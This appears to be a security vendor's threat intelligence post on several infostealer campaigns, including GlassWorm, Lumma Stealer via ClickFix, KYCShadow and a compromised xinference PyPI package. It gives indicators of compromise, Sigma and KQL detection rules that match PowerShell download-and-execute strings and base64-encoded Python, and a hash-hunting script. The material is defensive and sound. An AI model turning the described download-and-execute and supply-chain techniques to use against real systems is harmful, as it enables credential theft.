Back to Intelligence

GlassWorm, Lumma Stealer, and Xinference Compromise: Multi-Front Infostealer Assessment

SA
Security Arsenal Team
April 29, 2026
6 min read

Threat Summary

Recent OTX pulse data indicates a convergence of sophisticated supply chain attacks and social engineering campaigns aimed at harvesting credentials from enterprise environments, developers, and financial sectors. The threat landscape is dominated by the GlassWorm malware targeting developers via blockchain-based C2, the Lumma Stealer distributed via ClickFix phishing, and a new Android banking trojan (KYCShadow) exploiting fake KYC workflows. Additionally, threat actors are leveraging the hype around AI agents and frameworks (GachiLoader, Xinference compromise) to distribute infostealers like Rhadamanthys. The collective objective of these campaigns is the exfiltration of cryptocurrency wallets, cloud infrastructure keys, and banking OTPs.

Threat Actor / Malware Profile

GlassWorm

  • Distribution: Compromised code repositories and package managers.
  • Payload Behavior: Multi-stage infection fingerprinting the machine; fetches payloads via the Solana blockchain. Installs a fake browser extension for surveillance and a Remote Access Trojan (RAT).
  • C2 Communication: Solana blockchain transactions for payload fetching (novel C2 method).
  • Objective: Stealing cryptocurrency wallets and development credentials.

HijackLoader & Lumma Stealer (S1213)

  • Distribution: ClickFix-style phishing sites tricking users into running PowerShell commands.
  • Payload Behavior: Downloads an obfuscated MSI; employs DLL sideloading with renamed legitimate binaries.
  • Technique: PowerShell obfuscation, DLL sideloading.
  • Objective: Information stealing, credential theft.

KYCShadow

  • Distribution: WhatsApp messages masquerading as bank KYC verification apps.
  • Payload Behavior: Multi-stage dropper establishing persistence; uses Firebase for remote execution and WebView-based phishing.
  • C2 Communication: Firebase.
  • Objective: Credential theft, SMS interception (OTP theft), VPN manipulation to bypass banking security.

GachiLoader & Rhadamanthys

  • Distribution: Fake AI agent skills (OpenClaw) hosted on GitHub.
  • Payload Behavior: Pure social engineering; "skills" contain no code but lure users to download Windows binaries. Uses Node.js SEA and Electron droppers.
  • Objective: Delivering Rhadamanthys infostealer.

PyPI Supply Chain (Xinference)

  • Distribution: Compromised maintainer credentials on PyPI for the xinference library (versions 2.6.0, 2.6.1, 2.6.2).
  • Payload Behavior: Base64 encoded malicious code in __init__.py executes on import.
  • Objective: Cloud credential theft.

IOC Analysis

The provided indicators span multiple vectors critical for SOC operations:

  • Network Infrastructure: IP 85.11.161.198 and domains serv.[biz|xyz|api] represent active C2 infrastructure for Lumma Stealer and KYCShadow. These should be blocked immediately at the perimeter and proxy level.
  • File Hashes: A significant volume of SHA256 and MD5 hashes are provided for the malicious MSI payloads, Android APKs, and compromised PyPI packages. These can be loaded into EDR solutions for immediate quarantine.
  • Operationalizing IOCs: SOC teams should prioritize the network IOCs in firewall/NGFW blocks. File hashes should be used to scan historical data (last 30 days) in VDI and developer workstation environments to detect dormant infections.

Detection Engineering

Sigma Rules

YAML
---
title: Potential GlassWorm or PyPI Supply Chain Compromise
description: Detects suspicious Python processes loading encoded content or making network connections to non-standard endpoints immediately after install, characteristic of GlassWorm or Xinference compromises.
status: experimental
date: 2026/04/30
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_python:
    Image|endswith:
      - '\python.exe'
      - '\python3.exe'
    CommandLine|contains: 'import'
  selection_suspicious:
    CommandLine|contains:
      - 'base64'
      - '-enc'
      - 'Solana'
  condition: selection_python and selection_suspicious
falsepositives:
  - Legitimate developer scripts encoding data
level: high
tags:
  - attack.execution
  - attack.t1059.001
---
title: ClickFix Phishing Lumma Stealer Execution
description: Detects the execution pattern associated with the HijackLoader/Lumma Stealer campaign involving PowerShell downloading MSI files from remote servers.
status: experimental
date: 2026/04/30
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_powershell:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'DownloadString'
      - 'IEX'
      - 'Invoke-Expression'
  selection_msi:
    CommandLine|contains: '.msi'
  selection_c2:
    CommandLine|contains:
      - '85.11.161.198'
      - ':9658'
      - ':6600'
  condition: selection_powershell and selection_msi
falsepositives:
  - Low
level: critical
tags:
  - attack.initial_access
  - attack.t1566.001
---
title: GachiLoader AI Skill Lure Execution
description: Detects Node.js or Electron processes spawning suspicious child processes like cmd or powershell, indicative of the GachiLoader campaign using fake AI skills.
status: experimental
date: 2026/04/30
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\node.exe'
      - '\electron.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\msiexec.exe'
  condition: selection_parent and selection_child
falsepositives:
  - Legitimate software installation via Node.js
level: high
tags:
  - attack.execution
  - attack.t1204

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for C2 connections associated with KYCShadow and Lumma Stealer
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in ("serv.biz", "serv.xyz", "api.biz") 
   or RemoteIP == "85.11.161.198"
   or RemoteUrl contains "robinhuds.com"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| summarize Count=count() by DeviceName, RemoteUrl
| order by Count desc


kql
// Hunt for GlassWorm/Xinference suspicious Python activity
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName has "python"
| where ProcessCommandLine has "base64" or ProcessCommandLine has "Solana"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName

PowerShell Hunt Script

PowerShell
# IOC Hunt Script for GlassWorm, Lumma, and Xinference Hashes
# Requires Admin Privileges

$TargetHashes = @(
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc",
    "c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728",
    "818daf975f78ac30ba4ce0fdd2f7eb550cdc16701da35594e8c9cba72bc84a5c",
    "077d49fa708f498969d7cdffe701eb64675baaa4968ded9bd97a4936dd56c21c",
    "e1e007ce4eab7774785617179d1c01a9381ae83abfd431aae8dba6f82d3ac127",
    "3ee893ae46530b92e0d26435fb979d82", # MD5 for Xinference
    "b07a03883675654088a2b56a80933ca8"  # MD5 for Lumma
)

Write-Host "[+] Starting IOC Hunt for specific file hashes..." -ForegroundColor Cyan

$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($Drive in $Drives) {
    Write-Host "[+] Scanning drive $Drive..." -ForegroundColor Yellow
    try {
        Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue | 
        Get-FileHash -ErrorAction SilentlyContinue | 
        Where-Object { $TargetHashes -contains $_.Hash } | 
        ForEach-Object {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.Path) | Hash: $($_.Hash)" -ForegroundColor Red
        }
    }
    catch {
        # Ignore access errors
    }
}

# Check for suspicious Solana/GlassWorm browser extensions (Simplified Check)
$ExtPaths = @("$env:LOCALAPPDATA\Google\Chrome\User Data", "$env:APPDATA\Mozilla\Firefox\Profiles")
Write-Host "[+] Checking for suspicious browser extension artifacts..." -ForegroundColor Yellow
# (Logic would expand to enumerate IDs and check manifest. for specific GlassWorm keywords)

Write-Host "[+] Hunt complete." -ForegroundColor Cyan

Response Priorities

  • Immediate:

    • Block all IOCs listed in the IOC Analysis section at the firewall and proxy level.
    • Scan developer workstations and build servers for the xinference PyPI package versions 2.6.0, 2.6.1, and 2.6.2. Remove immediately.
    • Hunt for the execution of PowerShell commands associated with 85.11.161.198.

  • 24 Hours:

    • If compromise is suspected (especially with GlassWorm or Xinference), force a password rotation for all development and cloud API keys (AWS, Azure, GCP) used by affected machines.
    • Investigate mobile devices (MDM) for the presence of APKs matching the KYCShadow hashes (if EDR supports mobile) or warn users about fake KYC apps.

  • 1 Week:

    • Architecture Hardening: Implement strict package repository pinning (requirements.txt/hash-checking) for Python and Node.js environments to prevent supply chain poisoning.
    • Review and restrict the execution of unsigned binaries and macros downloaded from the internet.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialslumma-stealerglasswormsupply-chain-attackgachiloaderandroid-banking-trojan

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action